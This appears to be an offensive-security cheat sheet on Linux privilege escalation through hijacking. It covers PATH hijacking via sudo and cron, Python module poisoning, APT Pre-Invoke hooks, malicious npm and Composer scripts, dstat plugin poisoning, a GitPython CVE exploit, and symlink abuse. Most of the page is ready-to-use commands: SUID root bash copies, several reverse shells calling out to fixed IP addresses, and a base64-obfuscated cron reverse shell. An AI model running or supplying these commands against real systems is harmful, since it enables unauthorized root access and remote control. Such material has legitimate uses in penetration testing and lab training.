Hijacks
When a script is executed with elevated privileges (e.g., via sudo
or in a cron
job) and calls other binaries or scripts with relative paths
, it may be possible to hijack the execution flow by manipulating the PATH
variable or exploiting relative paths.
echo $PATH
Path Hijacking sudo
Bash
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/tokyo\nchown root:root /tmp/tokyo\nchmod 6777 /tmp/tokyo' | tee HIJACKED.sh
/tmp/tokyo -p
PHP
<?php
define('PATH', '/PATH/HIJACK');
system('cp /bin/bash /tmp/tokyo; chown root:root /tmp/tokyo; chmod 6777 /tmp/tokyo;');
?>
/tmp/tokyo -p
Path Hijacking cron
When
PATH
includes/usr/local/bin
before/usr/bin
in thecron
job's environment.When a binary or script is executed
without an absolute path
.
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/tokyo\nchmod u+s /tmp/tokyo' > /usr/local/bin/TARGET; chmod +x /usr/local/bin/TARGET
bash
dropsSUID
privileges by default, so make sure to run it with-p
to keep root:
tokyo -p
PHP
$sock=fsockopen("10.10.16.8", 4445);
exec("/bin/sh -i <&3 >&3 2>&3");
<?php
$bashPath = '/bin/bash';
$tokyoPath = '/tmp/tokyo';
exec("cp $bashPath $tokyoPath");
exec("chmod u+s $tokyoPath");
exec("chmod +x $tokyoPath");
?>
Reverse shell template
echo "* * * * * root echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuMC4zLzcwMjAgMD4mMQo= | base64 -d | bash" > clean
echo "bash -i >& /dev/tcp/172.20.0.3/7020 0>&1" | base64
Path Hijacking supervisord.pid
Process management tool for keeping services running.
Each managed process must have a
[program:<name>]
line followed by another linecommand=
where you should place the payload.
echo -e "[program:memcached]\ncommand = bash -c 'bash -i >& /dev/tcp/LHOST/PORT 0>&1'" > memcached.ini
Path Hijacking Python
Python prioritize modules within the vulnerable script's directory, so you could place the malicious module there
python -c 'import sys; print "\n".join(sys.path)'
find /usr/lib/python* -type f -writable -ls 2>&1 | grep python
find /path/to/venv -type f -writable -ls 2>&1 | grep python
find -type f -writable -ls 2>&1 | grep python
import pty
pty.spawn("/bin/bash")
echo 'import pty
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.6",4444))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()' >> os.py
Path Hijacking doas
doas
is a lightweight, simple command-line utility for running commands with elevated privileges on Unix-like systems, similar tosudo
.
doas.conf
have important information for privilege escalation:
find / -name "doas.conf" 2>/dev/null
Path Hijacking sudo -i
If there is a writable directory in the
$PATH
(e.g.,/tmp
or/home/user/
), and an attacker can control the contents of this directory.
First, create a malicious
bash
script in/tmp/bash
:
cd /var/tmp
cp /bin/bash .
sudo -i
Path Hijacking APT
Pre-Invoke
Create a malicious config file to be invoked before
APT
runs:
echo 'APT::Update::Pre-Invoke {"bash -c '\''bash -i >& /dev/tcp/192.168.0.10/4433 0>&1'\''"}' > file_name
APT
check this directory forpre-invoke
scripts:
/etc/apt/apt.conf.d
Just wait for listener.
npm
via
sudo
A
NodeJS
package is defined in a filepackage.json
, is possible to create a malicious package and run it with the--unsafe
option to get code execution:
{
"name": "root_please",
"version": "1.0.0",
"scripts": {
"preinstall": "/bin/bash"
}
}
The malicious
package.json
needs to be contain within the fake package directory; once is all setup just run it withsudo
:
sudo npm i package/ --unsafe
dstat
Plugin poisoning
Allows to run arbitrary python
scripts loaded as “external plugins” if they are located in one of the directories stated in the man
page:
~/.dstat/
(path of binary)/plugins/
/usr/share/dstat/
/usr/local/share/dstat
Normally to escalate privilege you want to choose the ones within the root
path, check for writable
permissions:
ls -ld /usr/local/share/dstat/
ls -ld /usr/share/dstat/
Create a malicious plugin:
echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_tokyo.py
echo 'import os; os.execv("/bin/sh", ["sh"])' > ~/.dstat/dstat_tokyo.py
Execute it with --PluginName
:
doas /usr/bin/dstat --tokyo
sudo dstat --tokyo
Composer
Hijacking
First create the temporal folder where you will invoke the shell from and save in an environmental variable:
TF=$(mktemp -d)
Once is done, create the malicious script to feed
composer
:
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
Finally, just execute the script with it's in-build option:
sudo composer --working-dir=$TF run-script x
GitPython
CVE-2022-24439
Inadequate validation of user input when handling remote URLs passed to the clone command:
echo "bash -i >& /dev/tcp/10.10.16.10/4444 0>&1" > /tmp/shell.sh
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell.sh'
Symbolic Links
via
sudo
Sudoedit Double Wildcard Exploit
Using this exploit is possible to create a symbolic link pointing to the
authorized_keys
file.
mkdir tokyo
ln -s /home/alekos/.ssh/authorized_keys layout.html
sudoedit -u alekos /var/www/testing/tokyo/layout.html
tar wildcards
mv development{,.orig}
ln -s /root development
tar xvf file.tar.gz -C /tmp/
Last updated